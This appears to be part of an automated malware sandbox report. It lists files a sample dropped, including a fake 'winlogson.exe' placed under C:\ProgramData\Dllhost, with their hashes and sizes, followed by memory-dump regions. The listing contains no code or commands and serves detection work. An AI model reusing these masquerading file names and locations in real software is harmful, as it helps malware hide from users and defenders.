85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\config.json

Filesize
319B

MD5
af9b6a4397d3980375234e480b0e6549

SHA1
03e7a05ce22c234cd5129705f96df42e50be3c63

SHA256
fbfcc328d75ce0f3285ea6ed0159bc26e53ff4765a1b334f784b89dc673f7f11

SHA512
2a65a9e3a2f0eacff5b3edbf75ef22500fa3d8f322ab0beac8ef125c25744894040963f97160c068178a859a5ebb2b783b0d99427466b91d9187f240bccb3190

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
bec4ceba3dd645af1e9114eb8d45838c

SHA1
7e47aa88a2ef7a277ffd94fce99ff93b044da116

SHA256
f430a7e9ead6ccfb797c7fc41f11375459bf368bacac9939d6a8cd73075d6df0

SHA512
6d3730a7be5f749eaecb5101e20b7d4b4e87428b01051c432c475fe3a53cedcb4f59ec25fafab4fe2f9e2d18fa1b900c25d7ded1f939418d5f72c5d755b3e39d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f

SHA1
cc38cfcd0b4265eb2200f105c9ae46b3809beb72

SHA256
b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a

SHA512
ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
cf2863b5c6484dd857b5bef76d1d864f

SHA1
69ed2b1b19a2f8fd5efe05ba6989472d7f57e89f

SHA256
935275e42e2d8189ffaf7daba68ddffb5dec2c70bc03193543b9c5254289487d

SHA512
928ddd2f0e80769cccb7090424e5c20effa336679a23077b0829787c0a66c923298f80cbdf966131cb6414e320d6e942e54001bc068d1751dab71b7c9cc82663

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
df8c36e788129f6285551b2788d427ee

SHA1
afd95ee1198d134d95bfbca488f28786564b7f99

SHA256
ddde34ed21b7336f9618b3d2f656214d367c5fde54b0b6bfbec1f6c800b655f5

SHA512
983f1b7b8c9a21147ceb2eea1e2949e9009a86f587041ae4ea66c5015945a6ce5f28f5647e1a7935fe35425e20c45d2bd41f26a29d3959578d02f11addb07ed0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6e4c872be2ad6af574d9c5e7a3fc97e7

SHA1
718c33f5e63324ef7d7960cebbfa869ad0548d4c

SHA256
5bfe8ca014413a70355feadd685e4113cef22bbed2f5ae4526ad4e9e53621987

SHA512
cdf7e742ff4280f33f54358b0d59f8bfc732a4784d45a9d14fe051b42fa57c876f90eb1933c3ffc4ea49db58716fe03e669e5e2ff82708c24e832e684779dec8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
30e435abc0e85d8970230fbdb2a55713

SHA1
ab9ef7de6a12c07780e56fc04064b2bf1c63a6e5

SHA256
c62f577a0b54d81d7f230735ced1c227ced51e26d2acea983dd83d9f42c9a89e

SHA512
dd328cffc081f40aa0188117bb8180b46a4c75288ec4e3480cc416ff16f468683824fb17f71716e4462e14e8c7105c6906103ad7e800b715b3639c089e62dab6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
30e435abc0e85d8970230fbdb2a55713

SHA1
ab9ef7de6a12c07780e56fc04064b2bf1c63a6e5

SHA256
c62f577a0b54d81d7f230735ced1c227ced51e26d2acea983dd83d9f42c9a89e

SHA512
dd328cffc081f40aa0188117bb8180b46a4c75288ec4e3480cc416ff16f468683824fb17f71716e4462e14e8c7105c6906103ad7e800b715b3639c089e62dab6

Download Submit
memory/1744-1330-0x00000000099F0000-0x0000000009A95000-memory.dmp

Filesize
660KB

Download
memory/1744-1218-0x0000000008510000-0x000000000855B000-memory.dmp

Filesize
300KB

Download
memory/1912-2550-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/2452-122-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2452-119-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2452-118-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2452-120-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2452-121-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/2452-123-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-159-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-175-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-177-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-178-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-179-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-180-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-181-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-182-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-183-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-184-0x000000000B640000-0x000000000B64A000-memory.dmp

Filesize
40KB

Download
memory/3836-185-0x000000000B870000-0x000000000B8D6000-memory.dmp

Filesize
408KB

Download
memory/3836-186-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-187-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-188-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-124-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/3836-130-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-131-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-133-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-132-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-134-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-135-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-136-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-176-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-137-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-138-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-139-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-140-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-141-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-142-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-143-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-152-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-144-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-174-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-173-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-172-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-145-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-146-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-153-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-147-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-171-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-148-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-170-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-149-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-169-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-154-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-150-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-168-0x000000000B690000-0x000000000B722000-memory.dmp

Filesize
584KB

Download
memory/3836-167-0x000000000BAE0000-0x000000000BFDE000-memory.dmp

Filesize
5.0MB

Download
memory/3836-166-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-165-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-151-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-164-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-163-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-162-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-161-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-158-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-156-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/3836-155-0x0000000077830000-0x00000000779BE000-memory.dmp

Filesize
1.6MB

Download
memory/4072-270-0x00000000083D0000-0x0000000008446000-memory.dmp

Filesize
472KB

Download
memory/4072-262-0x0000000007C40000-0x0000000007F90000-memory.dmp

Filesize
3.3MB

Download
memory/4072-236-0x00000000030C0000-0x00000000030F6000-memory.dmp

Filesize
216KB

Download
memory/4072-241-0x0000000007610000-0x0000000007C38000-memory.dmp

Filesize
6.2MB

Download
memory/4072-259-0x0000000007390000-0x00000000073B2000-memory.dmp

Filesize
136KB

Download
memory/4072-260-0x0000000007430000-0x0000000007496000-memory.dmp

Filesize
408KB

Download
memory/4072-265-0x0000000008110000-0x000000000812C000-memory.dmp

Filesize
112KB

Download
memory/4072-266-0x0000000008620000-0x000000000866B000-memory.dmp

Filesize
300KB

Download
memory/4072-302-0x00000000092E0000-0x0000000009313000-memory.dmp

Filesize
204KB

Download
memory/4072-303-0x00000000092C0000-0x00000000092DE000-memory.dmp

Filesize
120KB

Download
memory/4072-319-0x0000000009660000-0x0000000009705000-memory.dmp

Filesize
660KB

Download
memory/4072-323-0x0000000009870000-0x0000000009904000-memory.dmp

Filesize
592KB

Download
memory/4072-526-0x00000000097D0000-0x00000000097EA000-memory.dmp

Filesize
104KB

Download
memory/4072-531-0x0000000007000000-0x0000000007008000-memory.dmp

Filesize
32KB

Download
memory/4984-683-0x0000000000C70000-0x0000000000C86000-memory.dmp

Filesize
88KB

Download